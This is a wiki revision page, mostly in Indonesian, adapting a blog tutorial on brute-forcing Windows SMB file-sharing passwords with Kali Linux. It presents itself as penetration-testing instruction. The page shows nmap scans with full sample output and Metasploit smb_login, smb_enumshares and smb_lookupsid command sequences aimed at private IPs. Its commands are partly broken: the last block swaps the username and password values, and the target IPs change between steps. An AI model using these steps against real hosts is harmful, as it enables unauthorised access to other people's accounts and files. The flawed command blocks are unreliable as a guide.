Difference between revisions of "Kali Linux: Membobol File Sharing Password di Windows 7"

From OnnoWiki
Jump to navigation Jump to search
(New page: Sumber: https://sathisharthars.wordpress.com/2014/06/25/brute-force-smb-shares-in-windows-7-using-metasploit/ Brute-force SMB Shares in Windows 7 using Metasploit Filed under: ETHICAL HA...)
 
 
(7 intermediate revisions by the same user not shown)
Line 1: Line 1:
 
Sumber: https://sathisharthars.wordpress.com/2014/06/25/brute-force-smb-shares-in-windows-7-using-metasploit/
 
Sumber: https://sathisharthars.wordpress.com/2014/06/25/brute-force-smb-shares-in-windows-7-using-metasploit/
 
 
Brute-force SMB Shares in Windows 7 using Metasploit
 
Filed under: ETHICAL HACKING, KALI LINUX, PEN-TESTING, SECURTIY — 2 Comments
 
June 25, 2014
 
 
metasploit
 
 
 
 
 
 
An attacker will take the path of least resistance in order to gain access to critical systems and data. During a penetration test we’ll take the same tactic as well.
 
 
 
 
 
 
 
 
Frequently this is accomplished by guessing a password to a users account and then either using the privileges of that account to gain access to critical data or escalating that account to an administrator or root level account. Once credentials have been acquired for one host you’ll want to determine what other systems they work against. It is fairly common to gain access to a local administrator account on a workstation or server.
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
There are a number of ways to accomplish this task but one of the most efficient ways is using the smb_login module of Metasploit Framework for to test a single username/password combination against a lot of boxes very quickly.
 
 
 
 
 
 
 
 
 
 
 
 
This is where the SMB Login Check Scanner can be very useful, as it will connect to a range of hosts and determine if the username/password combination can access the target.
 
 
 
 
 
 
 
 
 
 
 
 
So today’s tutorial we going to brute-force login attempt to  the  windows shares to get samba credentials by using tools in Kali linux.
 
 
 
 
 
 
 
 
 
 
First we move to nmap scan to scan the target operating system for SAMBA (smb) enumeration. So my target ip is 192.168.31.2 and i am going to fingerprinting the OS  with -A option  to enable OS and version detection, script scanning, and traceroute.
 
 
 
 
 
 
 
 
 
 
#nmap -sS  -A -O  192.168.31.2
 
 
 
 
 
 
Screenshot from 2014-06-24 03:32:42
 
 
 
 
 
 
 
 
 
 
Nmap results shows that the target machine had smb with user level authentication. its clearly show we can authenticate smb with username and password.
 
 
 
 
 
 
 
 
 
 
 
 
Next we going to use metasploit framework to  brute-login against the smb of target machine. so we going to use smb_login module in msfconsole.
 
 
 
 
 
 
 
 
 
 
 
 
Metasploit’s smb_login module will attempt to login via SMB across a provided range of IP addresses.
 
 
 
 
 
 
 
 
 
 
#msfconsole
 
 
 
 
 
 
 
 
#msf > use auxiliary/scanner/smb/smb_login
 
 
 
 
 
 
 
 
#msf auxiliary(smb_login) > show options
 
 
 
 
 
 
 
 
#msf auxiliary(smb_login) > set RHOSTS 192.168.31.2
 
 
 
 
 
 
 
 
#msf auxiliary(smb_login) > set SMBUser sathish
 
 
 
 
 
 
 
 
#msf auxiliary(smb_login) > set PASS_FILE  ‘/home/sathish/password’
 
 
 
 
 
 
 
 
#msf auxiliary(smb_login) > set THREADS 10
 
 
 
 
 
 
 
 
#msf auxiliary(smb_login) > run
 
 
 
 
 
 
 
 
Above I used SMBUser has sathish because, My target machines computer name is sathish-PC so there is more chance of having an account with name the sathish and the password is brute-forced using a password file containing word lists in my home directory.
 
 
 
 
 
 
 
 
Screenshot from 2014-06-24 13:28:53
 
 
 
 
 
 
 
 
 
 
Keep in mind, this is very “loud” as it will show up as a failed login attempt in the event logs of  Windows box it touches. Be thoughtful on the network you are taking this action on.
 
 
 
 
 
 
 
 
Screenshot from 2014-06-24 13:29:29
 
 
 
 
 
 
 
 
After getting successful brute-force login, we need to  enumerates for SMB shares on the target machine with the known set of user credential.
 
 
 
 
 
  
 
   
 
   
 
 
   
 
   
  
The smb_enumshares module, as would be expected, enumerates any SMB shares that are available on a remote system.
+
==Scan Jaringan==
  
+
Contoh
  
   
+
  nmap -sS  -A -O  192.168.0.7
 +
nmap -sS  -A -O  192.168.0.0/24
 +
nmap -sS  -A -O  192.168.0.7,90
  
 
  
#msf > use auxiliary/scanner/smb/smb_enumshares
+
Contoh hasil
  
 +
Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2016-02-11 07:41 WIB
 +
Nmap scan report for 192.168.0.7
 +
Host is up (0.0027s latency).
 +
Not shown: 989 closed ports
 +
PORT      STATE SERVICE    VERSION
 +
22/tcp    open  ssh        OpenSSH 3.7.1p2 (protocol 2.0)
 +
| ssh-hostkey:
 +
|_  1024 17:60:bb:44:2f:36:d8:df:6b:98:fb:63:7f:52:a7:a1 (RSA)
 +
80/tcp    open  http        lighttpd 1.4.31
 +
|_http-server-header: lighttpd/1.4.31
 +
|_http-title: Site doesn't have a title (text/html).
 +
139/tcp  open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
 +
443/tcp  open  ssl/http    lighttpd 1.4.31
 +
| http-cisco-anyconnect:
 +
|_  ERROR: Not a Cisco ASA or unsupported version
 +
|_http-server-header: lighttpd/1.4.31
 +
|_http-title: Site doesn't have a title (text/html).
 +
| ssl-cert: Subject: commonName=develop/organizationName=buffalo/stateOrProvinceName=Tokyo/countryName=JP
 +
| Not valid before: 2007-06-13T05:47:53
 +
|_Not valid after:  2027-06-08T05:47:53
 +
|_ssl-date: 2016-02-10T23:18:49+00:00; -1h25m51s from scanner time.
 +
445/tcp  open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
 +
873/tcp  open  rsync      (protocol version 30)
 +
8873/tcp  open  ssl/rsync  (protocol version 30)
 +
9001/tcp  open  http        libwww-perl-daemon httpd 1.36
 +
| http-cisco-anyconnect:
 +
|_  ERROR: Not a Cisco ASA or unsupported version
 +
| http-robots.txt: 1 disallowed entry
 +
|_/
 +
|_http-title: Squeezebox Server
 +
9050/tcp  open  upnp        TwonkyMedia UPnP (Linux 2.X.X; UPnP 1.0; pvConnect SDK 1.0; SDK 1.1)
 +
9090/tcp  open  http        uTorrent WebUI
 +
|_http-methods: No Allow or Public header in OPTIONS response (status code 400)
 +
|_http-title: Site doesn't have a title (text/html).
 +
22939/tcp open  ssl/unknown
 +
MAC Address: 4C:E6:76:1F:15:4C (Buffalo)
 +
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
 +
TCP/IP fingerprint:
 +
OS:SCAN(V=6.49BETA4%E=4%D=2/11%OT=22%CT=1%CU=42073%PV=Y%DS=1%DC=D%G=Y%M=4CE
 +
OS:676%TM=56BBD996%P=x86_64-pc-linux-gnu)SEQ(SP=D6%GCD=1%ISR=D3%TI=Z%CI=Z%T
 +
OS:S=A)SEQ(SP=C1%GCD=1%ISR=C8%TI=Z%CI=Z%II=I%TS=A)OPS(O1=M5B4ST11NW7%O2=M5B
 +
OS:4ST11NW7%O3=M5B4NNT11NW7%O4=M5B4ST11NW7%O5=M5B4ST11NW7%O6=M5B4ST11)WIN(W
 +
OS:1=16A0%W2=16A0%W3=16A0%W4=16A0%W5=16A0%W6=16A0)ECN(R=Y%DF=Y%T=40%W=16D0%
 +
OS:O=M5B4NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=
 +
OS:Y%DF=Y%T=40%W=16A0%S=O%A=S+%F=AS%O=M5B4ST11NW7%RD=0%Q=)T4(R=Y%DF=Y%T=40%
 +
OS:W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=
 +
OS:)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=
 +
OS:S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RU
 +
OS:CK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)
 
   
 
   
 
+
Network Distance: 1 hop
 +
Service Info: OSs: Linux, Windows; CPE: cpe:/o:linux:linux_kernel:2, cpe:/o:microsoft:windows
 
   
 
   
 
+
Host script results:
 +
|_nbstat: NetBIOS name: TS-WVHL54C, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
 +
| smb-os-discovery:
 +
|  OS: Unix (Samba 3.6.3-31a.osstech)
 +
|  Computer name: TS-WVHL54C
 +
|  NetBIOS computer name:
 +
|  Domain name:
 +
|  FQDN: TS-WVHL54C
 +
|_  System time: 2016-02-11T06:18:51+07:00
 +
| smb-security-mode:
 +
|  account_used: guest
 +
|  authentication_level: user
 +
|  challenge_response: supported
 +
|_  message_signing: disabled (dangerous, but default)
 +
|_smbv2-enabled: Server doesn't support SMBv2 protocol
 
   
 
   
 
+
TRACEROUTE
#msf auxiliary(smb_enumshares) > show options
+
HOP RTT    ADDRESS
 
+
1  2.71 ms 192.168.0.7
 
   
 
   
 +
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
 +
Nmap done: 1 IP address (1 host up) scanned in 205.58 seconds
  
+
==Hack Password==
  
+
Menggunakan cara bruteforce untuk hack password.
 +
Cara ini cukup "ribut" karena semua kegiatan kita akan dicatat / di log oleh server, sehingga akan ketahuan.
  
#msf auxiliary(smb_enumshares) > set RHOSTS 192.168.31.2
+
msfconsole thankyou
 +
use auxiliary/scanner/smb/smb_login
 +
show options
 +
set RHOSTS 192.168.0.7
 +
set SMBUser onno
 +
set PASS_FILE  ‘/home/onno/password.txt’
 +
set THREADS 10
 +
run
  
 
  
 
 
 
 
#msf auxiliary(smb_enumshares) > set SMBUser sathish
 
 
 
 
 
 
 
 
#msf auxiliary(smb_enumshares) > set SMBPass bhuvi
 
 
 
 
 
 
 
 
#msf auxiliary(smb_enumshares) > set THREADS 10
 
 
 
 
 
 
#msf auxiliary(smb_enumshares) > run
 
 
 
 
 
 
 
 
Screenshot from 2014-06-24 13:31:34
 
 
 
 
 
 
 
 
Screenshot from 2014-06-24 13:32:26
 
 
 
 
 
 
 
 
 
 
It will list the SMB share on the target machine and now we need more details about the target  for the SID of users and groups.
 
 
 
 
 
 
 
 
The smb_lookupsid module brute-forces SID lookups on a range of targets to determine what local users exist the system. Knowing what users exist on a system can help to login.
 
 
 
 
 
 
 
 
#msf > use auxiliary/scanner/smb/smb_lookupsid
 
 
 
 
 
 
#msf auxiliary(smb_lookupsid) > show options
 
 
 
 
 
 
#msf auxiliary(smb_lookupsid) > set RHOSTS 192.168.31.2
 
 
 
 
 
 
#msf auxiliary(smb_lookupsid) > set SMBPass bhuvi
 
 
 
 
 
 
#msf auxiliary(smb_lookupsid) > set SMBUser sathish
 
 
 
 
 
 
 
 
#msf auxiliary(smb_lookupsid) > run
 
 
 
 
 
 
 
 
Screenshot from 2014-06-24 13:34:11
 
 
 
 
 
 
Screenshot from 2014-06-24 13:37:28
 
 
 
 
 
 
It will list the users and groups on the target machine with SID numbers, its help us to think more about the target system and from known user credential we going to mount the windows share on our attacking computer.
 
 
 
 
 
 
 
 
Screenshot from 2014-06-24 14:08:07
 
 
 
 
 
 
Screenshot from 2014-06-24 19:44:03
 
 
 
 
 
 
 
 
 
 
Screenshot from 2014-06-24 14:11:08
 
 
 
 
Screenshot from 2014-06-24 19:41:43
 
 
 
 
 
 
[Note]
 
 
 
 
 
 
 
 
A brute force attack or an aggressive password guessing attack is very noisy and will likely lock out user accounts depending on how the group policies for that domain have been configured.
 
 
 
 
 
 
 
  
So brute forcing windows accounts isn’t generally a very good idea due to lockout settings and the possibility of creating a Denial of Service condition. Most windows networks have group policies that enforce a lockout of X minutes after Y failed attempts. As such, brute force attacks are pretty much too risky.
+
Menggunakan modul smb_enumshares, kita bisa melakukan enumerasi setiap share SMB yang tersedia pada sistem remote.
  
 +
use auxiliary/scanner/smb/smb_enumshares
 +
show options
 +
set RHOSTS 192.168.31.2
 +
set SMBUser onno
 +
set SMBPass s3cr3t
 +
set THREADS 10
 +
run
  
  
 +
Modul smb_lookupsid, akan brute-force proses pencarian SID pada sejumlah target untuk menentukan pengguna lokal yang ada dalam sistem.
  
 +
use auxiliary/scanner/smb/smb_lookupsid
 +
show options
 +
set RHOSTS 192.168.31.2
 +
set SMBPass onno
 +
set SMBUser s3cr3t
 +
run
  
 
==Referensi==
 
==Referensi==
  
 
* https://sathisharthars.wordpress.com/2014/06/25/brute-force-smb-shares-in-windows-7-using-metasploit/
 
* https://sathisharthars.wordpress.com/2014/06/25/brute-force-smb-shares-in-windows-7-using-metasploit/

Latest revision as of 11:36, 23 April 2020

Sumber: https://sathisharthars.wordpress.com/2014/06/25/brute-force-smb-shares-in-windows-7-using-metasploit/



Scan Jaringan

Contoh 

nmap -sS  -A -O  192.168.0.7
nmap -sS  -A -O  192.168.0.0/24
nmap -sS  -A -O  192.168.0.7,90


Contoh hasil 

Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2016-02-11 07:41 WIB
Nmap scan report for 192.168.0.7
Host is up (0.0027s latency).
Not shown: 989 closed ports
PORT      STATE SERVICE     VERSION
22/tcp    open  ssh         OpenSSH 3.7.1p2 (protocol 2.0)
| ssh-hostkey: 
|_  1024 17:60:bb:44:2f:36:d8:df:6b:98:fb:63:7f:52:a7:a1 (RSA)
80/tcp    open  http        lighttpd 1.4.31
|_http-server-header: lighttpd/1.4.31
|_http-title: Site doesn't have a title (text/html).
139/tcp   open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
443/tcp   open  ssl/http    lighttpd 1.4.31
| http-cisco-anyconnect: 
|_  ERROR: Not a Cisco ASA or unsupported version
|_http-server-header: lighttpd/1.4.31
|_http-title: Site doesn't have a title (text/html).
| ssl-cert: Subject: commonName=develop/organizationName=buffalo/stateOrProvinceName=Tokyo/countryName=JP
| Not valid before: 2007-06-13T05:47:53 
|_Not valid after:  2027-06-08T05:47:53
|_ssl-date: 2016-02-10T23:18:49+00:00; -1h25m51s from scanner time.
445/tcp   open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
873/tcp   open  rsync       (protocol version 30)
8873/tcp  open  ssl/rsync   (protocol version 30)
9001/tcp  open  http        libwww-perl-daemon httpd 1.36
| http-cisco-anyconnect: 
|_  ERROR: Not a Cisco ASA or unsupported version
| http-robots.txt: 1 disallowed entry 
|_/
|_http-title: Squeezebox Server
9050/tcp  open  upnp        TwonkyMedia UPnP (Linux 2.X.X; UPnP 1.0; pvConnect SDK 1.0; SDK 1.1)
9090/tcp  open  http        uTorrent WebUI
|_http-methods: No Allow or Public header in OPTIONS response (status code 400)
|_http-title: Site doesn't have a title (text/html).
22939/tcp open  ssl/unknown
MAC Address: 4C:E6:76:1F:15:4C (Buffalo)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=6.49BETA4%E=4%D=2/11%OT=22%CT=1%CU=42073%PV=Y%DS=1%DC=D%G=Y%M=4CE
OS:676%TM=56BBD996%P=x86_64-pc-linux-gnu)SEQ(SP=D6%GCD=1%ISR=D3%TI=Z%CI=Z%T
OS:S=A)SEQ(SP=C1%GCD=1%ISR=C8%TI=Z%CI=Z%II=I%TS=A)OPS(O1=M5B4ST11NW7%O2=M5B
OS:4ST11NW7%O3=M5B4NNT11NW7%O4=M5B4ST11NW7%O5=M5B4ST11NW7%O6=M5B4ST11)WIN(W
OS:1=16A0%W2=16A0%W3=16A0%W4=16A0%W5=16A0%W6=16A0)ECN(R=Y%DF=Y%T=40%W=16D0%
OS:O=M5B4NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=
OS:Y%DF=Y%T=40%W=16A0%S=O%A=S+%F=AS%O=M5B4ST11NW7%RD=0%Q=)T4(R=Y%DF=Y%T=40%
OS:W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=
OS:)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=
OS:S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RU
OS:CK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S) 

Network Distance: 1 hop
Service Info: OSs: Linux, Windows; CPE: cpe:/o:linux:linux_kernel:2, cpe:/o:microsoft:windows 

Host script results:
|_nbstat: NetBIOS name: TS-WVHL54C, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery: 
|   OS: Unix (Samba 3.6.3-31a.osstech)
|   Computer name: TS-WVHL54C
|   NetBIOS computer name: 
|   Domain name: 
|   FQDN: TS-WVHL54C
|_  System time: 2016-02-11T06:18:51+07:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smbv2-enabled: Server doesn't support SMBv2 protocol 

TRACEROUTE
HOP RTT     ADDRESS
1   2.71 ms 192.168.0.7 

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 205.58 seconds

Hack Password

Menggunakan cara bruteforce untuk hack password. Cara ini cukup "ribut" karena semua kegiatan kita akan dicatat / di log oleh server, sehingga akan ketahuan. 

msfconsole thankyou
use auxiliary/scanner/smb/smb_login
show options
set RHOSTS 192.168.0.7
set SMBUser onno
set PASS_FILE  ‘/home/onno/password.txt’
set THREADS 10
run


Menggunakan modul smb_enumshares, kita bisa melakukan enumerasi setiap share SMB yang tersedia pada sistem remote. 

use auxiliary/scanner/smb/smb_enumshares
show options
set RHOSTS 192.168.31.2
set SMBUser onno
set SMBPass s3cr3t
set THREADS 10
run


Modul smb_lookupsid, akan brute-force proses pencarian SID pada sejumlah target untuk menentukan pengguna lokal yang ada dalam sistem. 

use auxiliary/scanner/smb/smb_lookupsid
show options
set RHOSTS 192.168.31.2
set SMBPass onno
set SMBUser s3cr3t
run

Referensi

Retrieved from "https://onnocenter.or.id/wiki/index.php?title=Kali_Linux:_Membobol_File_Sharing_Password_di_Windows_7&oldid=61358"